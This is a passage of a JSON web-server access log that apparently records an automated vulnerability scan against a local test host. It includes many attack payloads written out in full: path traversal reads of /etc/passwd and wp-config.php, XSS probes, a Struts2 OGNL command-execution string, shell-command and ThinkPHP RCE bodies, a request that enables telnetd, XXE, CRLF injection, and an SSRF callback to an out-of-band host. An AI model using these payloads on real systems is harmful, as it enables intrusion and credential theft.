HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/modules/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/luci HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /slr/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/functions/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login/?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /HyperGraphQL HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/flip/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"payload=<%3fxml+version%3d\x221.0\x22+%3f>%25xxe%3b]>","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://ca28fg0smpvbd3qg07h0na9fofgqb4ent.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adjuncts/3a890183/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 